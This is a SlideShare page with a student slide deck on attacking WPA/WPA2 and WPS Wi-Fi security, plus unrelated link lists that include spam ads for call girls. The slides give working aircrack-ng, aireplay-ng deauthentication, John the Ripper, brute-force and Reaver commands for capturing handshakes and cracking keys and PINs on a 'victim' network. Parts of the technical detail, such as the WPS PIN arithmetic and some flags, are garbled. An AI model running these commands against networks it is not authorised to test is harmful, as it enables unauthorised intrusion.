SlideShare uma empresa Scribd logo
1 de 34
WPA EXPLOITATION IN
THE WORLD OF WIRELESS
NETWORK
By Hariraj Rathod
8th sem
Department of Electronics and
Communication
WIFI – WIRELESS FIDELITY
 Wi-Fi, is a popular technology that allows an
electronic device to exchange data or
connect to the internet wirelessly using
radio waves.
 Wireless access allows users to connect to
the internet from any location within range
of a wireless access point.
SOME BASIC TERMS
 MAC address or physical address is a unique
identifier assigned to network interfaces for
communications
 Access point >> Wireless router
 SSID (service set identifier) >> Network Name
 BSSID (basic service set identification ) >>
MAC address of the access point
BASIC WORKING
 When a user uses wireless internet they generate
what are called data “packets”.
 Packets are transmitted between the wireless card
and the wireless access point via radio waves
whenever the computer is connected with the
access point.
BASIC WORKING CONTD.
 Depending on how long the computer is connected,
it can generate a certain number of packets per
day.
 The more users that are connected to one access
point, the more packets are generated.
WIRELESS USES RADIO FREQUENCY
 2.4 Ghz wifi spectrum
WIRELESS ENCRYPTION
 The main source of vulnerability associated
with wireless networks are the methods of
encryption. Different type of wireless
encryption are as follows:
 WEP
 WPA
 WPA2
WEP
 Stands for Wired Equivalent Privacy.
 WEP is recognizable by the key of 10 or
26 hexadecimal digits.
 WEP protocol was not developed by researchers or
experts in security and cryptography.
 Initial bytes of the key stream depended on just a
few bits of the encryption key.
WEP CONTINUED
 WEP Encryption Process
ICV:-32 bit integrity check value (ICV)
IV:- Initialization Vector
WEP CONTINUED
 WEP Decryption Process
With multiple wireless clients sending a large amount of data, an attacker
can remotely capture large amounts of WEP ciphertext and use
cryptanalysis methods to determine the WEP key.
WPA OR WPA2
 Stands for Wi-Fi Protected Access
 Created to provide stronger security
 Still able to be cracked if a short password is used.
 If a long passphrase or password is used, these protocol are
virtually not crackable.
 WPA-PSK and TKIP(Temporal Key Integrity Protocol ) or AES(Advance
Encryption Standard) use a Pre-Shared Key (PSK) that is more than 7
and less than 64 characters in length.
 WPS (WiFi protected Feature) simple plug and play feature.
USING BACKTRACK >>
 Some Basic Backtrack Terms >>
 Wlan1 – wireless interface
 Mon0 – monitor mode
 Handshake –
 refers to the negotiation process between the computer
and a WiFi server using WPA encryption.
 Needed to crack WPA/WPA2.
 Dictionary - consisting the list of common
passwords.
 .cap file – used to store packets.
MONITOR MODE
 Monitor mode, or RFMON (Radio Frequency
MONitor) mode, allows a computer with a wireless
network interface controller (WNIC) to monitor all
traffic received from the wireless network.
 Monitor mode allows packets to be captured
without having to associate with an access point
first.
TOOLS USED
 Airmon-ng >> Placing different cards in monitor mode
 Airodump-ng (Packet sniffer ) >> Tool used to listen to
wireless routers in the area.
 Aireplay-ng ( Packet injector ) >> Aireplay-ng is used to
inject frames.
 The primary function is to generate traffic for the later use
in aircrack-ng for cracking the WEP and WPA-PSK keys.
 Aircrack-ng >> Cracks WEP and WPA (Dictionary
attack) keys.
TOOLS USED….CONTINUED
 Word Field (Brute Force)
 Reaver Tool. (Brute Force)
AIRCRACK-NG
 Selecting the Interface to put it in monitor mode.
 Command used airmon-ng start wlan1
AIRCRACK-NG CONTINUED
 Start Capturing Packets.
 Airodump-ng mon0
 Airodump-ng mon0 –channel 1 –bssid “mac id”
–w reddot
AIRCRACK-NG CONTINUED
 Deauthenticate the device connected to access
point and force them to re exchange WPA key.
 Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 –c
90:4C:E5:B2:6F:D8 mon0 where "-0 4" tells
aireplay to inject deauthentication packets (4 of
them), "-a" is the wireless access point MAC
address and "-c" is the client (victim) MAC address.
AIRCRACK-NG CONTINUED
 Authentication process in WPA
AIRCRACK-NG CONTINUED
 4-way handshake os captured.
AIRCRACK-NG CONTINUED
 Cracking the WPA key using aircrack-ng, dictionary
file and 4-way handshake captured file redot.cap
aircrack-ng -w
/home/pranav/download/password.lst–b
F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap
where "-w" specifies the dictionary file to use.
JOHN THE RIPPER
 Faster then the previously used tool.
 /pentest/password/john-1.7.6.jumbo12/run/john -
stdout -incremantal all aircrack-ng –b
00:17:9A:82:44:1B -w -/home/pranav/test-01.cap
WORD FIELD
 Word Field is a brute force attack.
 Command line used wordfield [OPTION...]
MINLENGTH [MAXLENGTH]
 Wordfield -a -n 8 8" will output all possible
alphanumeric strings which are 8 characters long.
 wordfield -a -n 8 8 | aircrack-ng –b
00:17:9A:82:44:1B -w - /home/pranav/Wifire-
02.cap
 This attack is really effective on weak keys.
WORD FIELD CONTINUED
 The below took 22 hrs 7 minutes and 35 seconds
DICTIONARY AND BRUTE FORCE LIMITATIONS
 Passphrase cant be necessarily be found in
Dictionary list hence it has its limitations.
 Brute force technics require lot of fast hardware
computational power.
Source: http://lastbit.com/pswcalc.asp
REAVER TOOL.
 Reaver is fantastic tool to crack WPS pin written by
Craig Heffner.
 This tool exploits the wps 8 digit pin.
 1 bit is a checksum bit.
 7 unknown numbers, meaning there are a possible
10^7 (10,000,000) combinations which will take
approximately 116 days to break at 1 attempt every
second.
REAVER TOOL CONTINUED
 WPS pin 65020920
REAVER TOOL CONTINUED
 Finding WPS victim
 wash –I mon0
REAVER TOOL CONTINUED
CRACKING TECHNIQUE
 WPS pin 6502-0920
 10^4 (10,000) combinations.
 But since 1st bit is checksum bit hence the
combinations reduce to 10^3(1000)
 This reduces the time required to break the PIN to
just over 3 hours - Again, assuming that 1 attempt
is made every second.
REAVER TOOL CONTINUED
 reaver -i mon0 –b F4:EC:38:BA:6C:44
REAVER TOOL CONTINUED
BESECURED
REFERENCES
 Wi-Fi security – WEP, WPA and WPA2 Guillaume
Lehembre
 http://en.wikipedia.org/wiki/Wi-
Fi_Protected_Access#WPS_PIN_recovery
 https://sites.google.com/site/clickdeathsquad/Home/cds
-wpacrack
 http://samiux.blogspot.in/2010/04/howto-
crackwpawpa2-psk-with-john.html
 http://www.zer0trusion.com/2011/09/crackingwpa-
without-dictionary.html
 Tactical Network Solutions
 WiFi Security Megaprimer by Vivek Ramchandran
THANKS : )

Mais conteúdo relacionado

Mais procurados

Firewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaFirewall arch by Tareq Hanaysha
Firewall arch by Tareq Hanaysha
Hanaysha
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentals
Tariq kanher
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse game
Jaime Sánchez
 
Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networks
guestf2e41
 
Detection and analysis_of_syn_flood_ddos
Detection and analysis_of_syn_flood_ddosDetection and analysis_of_syn_flood_ddos
Detection and analysis_of_syn_flood_ddos
Oleh Stupak
 

Mais procurados (20)

Firewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaFirewall arch by Tareq Hanaysha
Firewall arch by Tareq Hanaysha
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
 
Wireless security
Wireless securityWireless security
Wireless security
 
Advanced WiFi Attacks Using Commodity Hardware
Advanced WiFi Attacks Using Commodity HardwareAdvanced WiFi Attacks Using Commodity Hardware
Advanced WiFi Attacks Using Commodity Hardware
 
Kracking WPA2
Kracking WPA2Kracking WPA2
Kracking WPA2
 
WPA 3
WPA 3WPA 3
WPA 3
 
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hacking
 
Wireless Hacking Fast Track
Wireless Hacking Fast TrackWireless Hacking Fast Track
Wireless Hacking Fast Track
 
Resilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential ModeResilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential Mode
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentals
 
WiFiHop - mitigating the Evil twin attack through multi-hop detection
WiFiHop - mitigating the Evil twin attack through multi-hop detectionWiFiHop - mitigating the Evil twin attack through multi-hop detection
WiFiHop - mitigating the Evil twin attack through multi-hop detection
 
Wpa2 psk security measure
Wpa2 psk security measureWpa2 psk security measure
Wpa2 psk security measure
 
Brst – Border Router Security Tool
Brst – Border Router Security ToolBrst – Border Router Security Tool
Brst – Border Router Security Tool
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse game
 
Firewall
FirewallFirewall
Firewall
 
RSA - WLAN Hacking
RSA - WLAN HackingRSA - WLAN Hacking
RSA - WLAN Hacking
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
 
Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networks
 
Detection and analysis_of_syn_flood_ddos
Detection and analysis_of_syn_flood_ddosDetection and analysis_of_syn_flood_ddos
Detection and analysis_of_syn_flood_ddos
 

Semelhante a Exploiting WiFi Security

Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
Mihir Shah
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_k
Rama Krishna M
 
4 wifi security
4 wifi security4 wifi security
4 wifi security
al-sari7
 
Wireless hacking septafiansyah
Wireless hacking   septafiansyahWireless hacking   septafiansyah
Wireless hacking septafiansyah
Septafiansyah P
 

Semelhante a Exploiting WiFi Security (20)

Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Wifi hacking
Wifi hackingWifi hacking
Wifi hacking
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_k
 
4 wifi security
4 wifi security4 wifi security
4 wifi security
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11b
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11b
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh Jadon
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans security
 
Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018
 
Aircrack
AircrackAircrack
Aircrack
 
Wireless hacking septafiansyah
Wireless hacking   septafiansyahWireless hacking   septafiansyah
Wireless hacking septafiansyah
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 
Wireless lan security(10.8)
Wireless lan security(10.8)Wireless lan security(10.8)
Wireless lan security(10.8)
 
Wireless hacking and security
Wireless hacking and securityWireless hacking and security
Wireless hacking and security
 
Wifi- technology_moni
Wifi- technology_moniWifi- technology_moni
Wifi- technology_moni
 
Fudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to InternalsFudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to Internals
 
Research Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and ScienceResearch Inventy : International Journal of Engineering and Science
Research Inventy : International Journal of Engineering and Science
 

Último

Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night StandCall Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
amitlee9823
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
dollysharma2066
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Christo Ananth
 
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar  ≼🔝 Delhi door step de...Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar  ≼🔝 Delhi door step de...
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
AKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes ---  Unit 3.pdfAKTU Computer Networks notes ---  Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdf
ankushspencer015
 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
ssuser89054b
 
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
dharasingh5698
 

Último (20)

data_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdfdata_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdf
 
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
 
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night StandCall Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPT
 
Roadmap to Membership of RICS - Pathways and Routes
Roadmap to Membership of RICS - Pathways and RoutesRoadmap to Membership of RICS - Pathways and Routes
Roadmap to Membership of RICS - Pathways and Routes
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
 
Vivazz, Mieres Social Housing Design Spain
Vivazz, Mieres Social Housing Design SpainVivazz, Mieres Social Housing Design Spain
Vivazz, Mieres Social Housing Design Spain
 
Thermal Engineering Unit - I & II . ppt
Thermal Engineering  Unit - I & II . pptThermal Engineering  Unit - I & II . ppt
Thermal Engineering Unit - I & II . ppt
 
Intze Overhead Water Tank Design by Working Stress - IS Method.pdf
Intze Overhead Water Tank  Design by Working Stress - IS Method.pdfIntze Overhead Water Tank  Design by Working Stress - IS Method.pdf
Intze Overhead Water Tank Design by Working Stress - IS Method.pdf
 
Call for Papers - International Journal of Intelligent Systems and Applicatio...
Call for Papers - International Journal of Intelligent Systems and Applicatio...Call for Papers - International Journal of Intelligent Systems and Applicatio...
Call for Papers - International Journal of Intelligent Systems and Applicatio...
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon  6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon  6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
 
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar  ≼🔝 Delhi door step de...Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar  ≼🔝 Delhi door step de...
Call Now ≽ 9953056974 ≼🔝 Call Girls In New Ashok Nagar ≼🔝 Delhi door step de...
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
AKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes ---  Unit 3.pdfAKTU Computer Networks notes ---  Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdf
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineering
 
Double Revolving field theory-how the rotor develops torque
Double Revolving field theory-how the rotor develops torqueDouble Revolving field theory-how the rotor develops torque
Double Revolving field theory-how the rotor develops torque
 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
 

Exploiting WiFi Security

  • 1. WPA EXPLOITATION IN THE WORLD OF WIRELESS NETWORK By Hariraj Rathod 8th sem Department of Electronics and Communication
  • 2. WIFI – WIRELESS FIDELITY  Wi-Fi, is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves.  Wireless access allows users to connect to the internet from any location within range of a wireless access point.
  • 3. SOME BASIC TERMS  MAC address or physical address is a unique identifier assigned to network interfaces for communications  Access point >> Wireless router  SSID (service set identifier) >> Network Name  BSSID (basic service set identification ) >> MAC address of the access point
  • 4. BASIC WORKING  When a user uses wireless internet they generate what are called data “packets”.  Packets are transmitted between the wireless card and the wireless access point via radio waves whenever the computer is connected with the access point.
  • 5. BASIC WORKING CONTD.  Depending on how long the computer is connected, it can generate a certain number of packets per day.  The more users that are connected to one access point, the more packets are generated.
  • 6. WIRELESS USES RADIO FREQUENCY  2.4 Ghz wifi spectrum
  • 7. WIRELESS ENCRYPTION  The main source of vulnerability associated with wireless networks are the methods of encryption. Different type of wireless encryption are as follows:  WEP  WPA  WPA2
  • 8. WEP  Stands for Wired Equivalent Privacy.  WEP is recognizable by the key of 10 or 26 hexadecimal digits.  WEP protocol was not developed by researchers or experts in security and cryptography.  Initial bytes of the key stream depended on just a few bits of the encryption key.
  • 9. WEP CONTINUED  WEP Encryption Process ICV:-32 bit integrity check value (ICV) IV:- Initialization Vector
  • 10. WEP CONTINUED  WEP Decryption Process With multiple wireless clients sending a large amount of data, an attacker can remotely capture large amounts of WEP ciphertext and use cryptanalysis methods to determine the WEP key.
  • 11. WPA OR WPA2  Stands for Wi-Fi Protected Access  Created to provide stronger security  Still able to be cracked if a short password is used.  If a long passphrase or password is used, these protocol are virtually not crackable.  WPA-PSK and TKIP(Temporal Key Integrity Protocol ) or AES(Advance Encryption Standard) use a Pre-Shared Key (PSK) that is more than 7 and less than 64 characters in length.  WPS (WiFi protected Feature) simple plug and play feature.
  • 12. USING BACKTRACK >>  Some Basic Backtrack Terms >>  Wlan1 – wireless interface  Mon0 – monitor mode  Handshake –  refers to the negotiation process between the computer and a WiFi server using WPA encryption.  Needed to crack WPA/WPA2.  Dictionary - consisting the list of common passwords.  .cap file – used to store packets.
  • 13. MONITOR MODE  Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received from the wireless network.  Monitor mode allows packets to be captured without having to associate with an access point first.
  • 14. TOOLS USED  Airmon-ng >> Placing different cards in monitor mode  Airodump-ng (Packet sniffer ) >> Tool used to listen to wireless routers in the area.  Aireplay-ng ( Packet injector ) >> Aireplay-ng is used to inject frames.  The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys.  Aircrack-ng >> Cracks WEP and WPA (Dictionary attack) keys.
  • 15. TOOLS USED….CONTINUED  Word Field (Brute Force)  Reaver Tool. (Brute Force)
  • 16. AIRCRACK-NG  Selecting the Interface to put it in monitor mode.  Command used airmon-ng start wlan1
  • 17. AIRCRACK-NG CONTINUED  Start Capturing Packets.  Airodump-ng mon0  Airodump-ng mon0 –channel 1 –bssid “mac id” –w reddot
  • 18. AIRCRACK-NG CONTINUED  Deauthenticate the device connected to access point and force them to re exchange WPA key.  Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 –c 90:4C:E5:B2:6F:D8 mon0 where "-0 4" tells aireplay to inject deauthentication packets (4 of them), "-a" is the wireless access point MAC address and "-c" is the client (victim) MAC address.
  • 20. AIRCRACK-NG CONTINUED  4-way handshake os captured.
  • 21. AIRCRACK-NG CONTINUED  Cracking the WPA key using aircrack-ng, dictionary file and 4-way handshake captured file redot.cap aircrack-ng -w /home/pranav/download/password.lst–b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap where "-w" specifies the dictionary file to use.
  • 22. JOHN THE RIPPER  Faster then the previously used tool.  /pentest/password/john-1.7.6.jumbo12/run/john - stdout -incremantal all aircrack-ng –b 00:17:9A:82:44:1B -w -/home/pranav/test-01.cap
  • 23. WORD FIELD  Word Field is a brute force attack.  Command line used wordfield [OPTION...] MINLENGTH [MAXLENGTH]  Wordfield -a -n 8 8" will output all possible alphanumeric strings which are 8 characters long.  wordfield -a -n 8 8 | aircrack-ng –b 00:17:9A:82:44:1B -w - /home/pranav/Wifire- 02.cap  This attack is really effective on weak keys.
  • 24. WORD FIELD CONTINUED  The below took 22 hrs 7 minutes and 35 seconds
  • 25. DICTIONARY AND BRUTE FORCE LIMITATIONS  Passphrase cant be necessarily be found in Dictionary list hence it has its limitations.  Brute force technics require lot of fast hardware computational power. Source: http://lastbit.com/pswcalc.asp
  • 26. REAVER TOOL.  Reaver is fantastic tool to crack WPS pin written by Craig Heffner.  This tool exploits the wps 8 digit pin.  1 bit is a checksum bit.  7 unknown numbers, meaning there are a possible 10^7 (10,000,000) combinations which will take approximately 116 days to break at 1 attempt every second.
  • 27. REAVER TOOL CONTINUED  WPS pin 65020920
  • 28. REAVER TOOL CONTINUED  Finding WPS victim  wash –I mon0
  • 29. REAVER TOOL CONTINUED CRACKING TECHNIQUE  WPS pin 6502-0920  10^4 (10,000) combinations.  But since 1st bit is checksum bit hence the combinations reduce to 10^3(1000)  This reduces the time required to break the PIN to just over 3 hours - Again, assuming that 1 attempt is made every second.
  • 30. REAVER TOOL CONTINUED  reaver -i mon0 –b F4:EC:38:BA:6C:44
  • 33. REFERENCES  Wi-Fi security – WEP, WPA and WPA2 Guillaume Lehembre  http://en.wikipedia.org/wiki/Wi- Fi_Protected_Access#WPS_PIN_recovery  https://sites.google.com/site/clickdeathsquad/Home/cds -wpacrack  http://samiux.blogspot.in/2010/04/howto- crackwpawpa2-psk-with-john.html  http://www.zer0trusion.com/2011/09/crackingwpa- without-dictionary.html  Tactical Network Solutions  WiFi Security Megaprimer by Vivek Ramchandran